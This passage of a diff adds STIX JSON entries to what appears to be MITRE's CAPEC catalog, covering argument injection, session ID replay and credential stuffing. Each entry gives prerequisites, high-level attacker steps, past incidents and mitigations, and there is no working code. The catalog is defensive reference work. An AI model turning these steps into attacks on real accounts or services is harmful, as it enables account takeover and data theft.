+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "\n A terrestrial satellite jammer with a signal more powerful than that of the satellite attempting to communicate with the target.\n The adversary must know the location of the target satellite dish.\n " + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.", + "external_references": [ + { + "external_id": "CAPEC-6", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-146", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Jouko Pynnonen, Java Web Start argument injection vulnerability", + "external_id": "REF-482", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/archive/1/393696" + } + ], + "id": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Argument Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. [REF-482]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discovery of potential injection vectors: Using an automated tool or manual discovery, the attacker identifies services or methods with arguments that could potentially be used as injection vectors (OS, API, SQL procedures, etc.).

  2. Techniques
    Manually cover the application and record the possible places where arguments could be passed into external systems.
    Use a spider, for web applications, to create a list of URLs and associated inputs.

Experiment

  1. 1. Attempt variations on argument content: Possibly using an automated tool, the attacker will perform injection variations of the arguments.

  2. Techniques
    Use a very large list of probe strings in order to detect if there is a positive result, and, what type of system has been targeted (if obscure).
    Use a proxy tool to record results, error messages and/or log if accessible.

Exploit

  1. Abuse of the application: The attacker injects specific syntax into a particular argument in order to generate a specific malicious effect in the targeted application.

  2. Techniques
    Manually inject specific payload into targeted argument.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software fails to strip all user-supplied input of any content that could cause the shell to perform unexpected actions.", + "Software must allow for unvalidated or unfiltered input to be executed on operating system shell, and, optionally, the system configuration must allow for output to be sent back to client." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Medium": "The attacker has to identify injection vector, identify the operating system-specific commands, and optionally collect the output." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. 
Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.", + "id": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--196a8c07-3041-48df-97b8-d20a2bf800b7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. 
chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred.", + "id": "course-of-action--320708f6-d5a8-4781-bcef-5d707ceeb0f0", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c3192605-c8b0-48c6-a253-ced90d7fe3e0", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--320708f6-d5a8-4781-bcef-5d707ceeb0f0", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise.", + "id": "course-of-action--9c1506e3-58e3-4856-866d-9ec6c8a8a9ad", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba5cb3e3-2de4-49cd-a6c0-587480f23acd", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--9c1506e3-58e3-4856-866d-9ec6c8a8a9ad", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.", + "external_references": [ + { + "external_id": "CAPEC-60", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/60.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-488", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Access Token 
Manipulation:Token Impersonation/Theft", + "external_id": "T1134.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134/001" + }, + { + "description": "Use Alternate Authentication Material:Web Session Cookie", + "external_id": "T1550.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/004" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Reusing Session IDs (aka Session Replay)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls. See also: CVE-1999-0428", + "Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user's answer or forward URLs. See also: CVE-2002-0258" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker interacts with the target host and finds that session IDs are used to authenticate users.

  2. The attacker steals a session ID from a valid user.

Exploit

  1. The attacker tries to use the stolen session ID to gain access to the system with the privileges of the session ID's original owner.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host uses session IDs to keep track of the users.", + "Session IDs are used to control access to resources.", + "The session IDs used by the target host are not well protected from session theft." + ], + "x_capec_skills_required": { + "Low": "If an attacker can steal a valid session ID, they can then try to be authenticated with that stolen session ID.", + "Medium": "More sophisticated attack can be used to hijack a valid session from a user and spoof a legitimate user by reusing their valid session ID." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always invalidate a session ID after the user logout.", + "id": "course-of-action--e132b1ab-8471-4391-8be7-58657c09f46c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--908e8d74-13d5-49a7-ac4c-99df0daf47f0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e132b1ab-8471-4391-8be7-58657c09f46c", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Setup a session time out for the session IDs.", + "id": "course-of-action--887085f5-8775-46fa-bca9-fa2fa8d395a3", + "modified": 
"2022-09-29T00:00:00.000Z", + "name": "coa-60-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f28d834-ffd7-4c6d-ad68-e70a69745dc9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--887085f5-8775-46fa-bca9-fa2fa8d395a3", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect the communication between the client and server. For instance it is best practice to use SSL to mitigate adversary in the middle attacks (CAPEC-94).", + "id": "course-of-action--4f370dea-3940-4d61-bccc-2945efaee2fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb55e2e4-e6f7-45ee-9ae9-fd7631b85a05", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f370dea-3940-4d61-bccc-2945efaee2fc", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not code send session ID with GET method, otherwise the session ID will be copied to the URL. In general avoid writing session IDs in the URLs. URLs can get logged in log files, which are vulnerable to an attacker.", + "id": "course-of-action--c2568b87-4ece-4f22-a1c1-5305dd455ab4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71ab000c-de21-4717-95f9-4aae387d2d7c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c2568b87-4ece-4f22-a1c1-5305dd455ab4", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt the session data associated with the session ID.", + "id": "course-of-action--bfd1036e-01fb-4b7d-a112-830c3c3a4b0e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5dc170d-4034-4559-acd3-ad3cfff69416", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--bfd1036e-01fb-4b7d-a112-830c3c3a4b0e", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use multifactor authentication.", + "id": "course-of-action--f8aa308d-e6bc-4de3-86be-da1213ff1371", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f886c45-625d-4dd6-9659-8b92fdb432e3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8aa308d-e6bc-4de3-86be-da1213ff1371", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. 
Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.\n ", + "external_references": [ + { + "external_id": "CAPEC-600", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/600.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Brute Force:Credential Stuffing", + "external_id": "T1110.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/004" + }, + { + "description": "Credential stuffing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + }, + { + "description": "Credential stuffing, Open Web Application Security Project (OWASP)", + "external_id": "REF-568", + "source_name": "reference_from_CAPEC", + "url": 
"https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Jessica Silver-Greenberg, Matthew Goldstein, Nicole Perlroth, JPMorgan Chase Hacking Affects 76 Million Households, 2014--10---02, The New York Times", + "external_id": "REF-569", + "source_name": "reference_from_CAPEC", + "url": "https://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/" + } + ], + "id": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Stuffing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user leverages the password \"Password123\" for a handful of application logins. 
An adversary obtains a victim's username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user's bank account and transfer money to an offshore account.", + "In October 2014 J.P. Morgan's Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

  2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.
  3. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

  4. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each username/password combination until the target grants access.

  2. Techniques
    Manually or automatically enter each username/password combination through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications.\n The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform.\n Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user's password history for an account.\n Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. 
Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "A known list of username/password combinations.", + "A custom script that leverages the credential list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Credential Stuffing attack is very straightforward." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4ceb80d-d66e-40ed-8041-badec381e5b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5041416c-f169-4ccd-a849-d3df74a189c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--31e79d3e-c3fa-47e2-9e66-4fec40ce3d44", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46e1f0c5-b178-4459-96f1-6522f4e3e9ab", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5bcb0cc-37a1-46f8-8b46-cd63f87de636", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--3123edea-0c54-4b71-be21-4d83cea9c940", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5589acda-9084-4d60-a9f7-5bb13e6d9196", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba6343af-b630-429a-b10a-f9e9ac7ff6a2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 